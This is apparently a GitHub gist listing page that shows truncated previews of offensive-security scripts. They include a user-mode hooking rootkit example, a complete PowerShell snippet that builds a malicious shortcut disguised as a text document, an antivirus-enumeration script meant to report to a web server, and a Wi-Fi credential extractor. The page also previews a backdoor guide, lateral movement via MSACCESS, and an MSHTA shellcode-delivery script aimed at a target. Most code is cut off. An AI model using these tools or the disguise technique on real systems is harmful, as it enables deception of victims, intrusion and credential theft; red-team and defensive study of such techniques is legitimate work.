sasqwatch
I may be slow to respond.
@sasqwatch
sasqwatch / Injectable.cpp
Created February 13, 2019 09:34 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
@sasqwatch
sasqwatch / LNK-creator.ps1
Created February 13, 2019 09:34 — forked from leoloobeek/LNK-creator.ps1
Create LNK file
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()
@sasqwatch
sasqwatch / enumAV.vbs
Created February 13, 2019 09:34 — forked from leoloobeek/enumAV.vbs
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
Function Base64Encode(sText)
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.NodeTypedValue = sText
Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")
@sasqwatch
sasqwatch / Extract-WiFi-Creds.ps1
Created February 13, 2019 09:35 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
@sasqwatch
sasqwatch / InterfaceTree.psm1
Created March 15, 2019 21:04 — forked from Cirzen/InterfaceTree.psm1
Get InterfaceTree module
function Get-InterfaceTree
{
<#
.SYNOPSIS
Displays a tree of interfaces for a given type
.DESCRIPTION
Recursively runs the GetInterfaces() method on a type and its interfaces to build a picture of all the interfaces that are applied to a type
.EXAMPLE
PS C:\> Get-InterfaceTree hashtable
@sasqwatch
sasqwatch / CVE-2019-5418_is_RCE.md
Created March 21, 2019 17:34 — forked from mala/CVE-2019-5418_is_RCE.md
Rails' CVE-2019-5418 is RCE (Remote code execution)
Preface

  • This is an article I wrote on a day off, and it has no relation whatsoever to the organization I belong to.

Summary

  • CVE-2019-5418 is in reality very likely RCE, yet it was published under the unfamiliar name File Content Disclosure, with CVE-2019-5419 described as allowing DoS.
  • Yes, how to disclose a vulnerability is genuinely a difficult problem; when it comes to a vulnerability in software that is widely used and whose impact would be enormous, I well understand why many people say not to publish concrete attack code.
  • However, even the description of the scope of impact is inaccurate. I think this is a bad trend. Is this the result of consideration, or the result of ignorance?
@sasqwatch
sasqwatch / blog.txt
Created March 26, 2019 23:27
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a firewall, NAT and VPN.
We will use 3 tools in this example.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
  • Use curl to get the JSON response for the latest release
  • Use grep to find the line containing file URL
  • Use cut and tr to extract the URL
  • Use wget to download it
curl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \
@sasqwatch
sasqwatch / TestMSHTAShellcodeDelivery.ps1
Created April 11, 2019 22:14
MSHTA Test For Defenders - hosts an HTA in PowerShell, connects remotely and executes.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credits for CACTUSTORCH HERE
I was in escape sequence hell ;-)
' ( ) ( )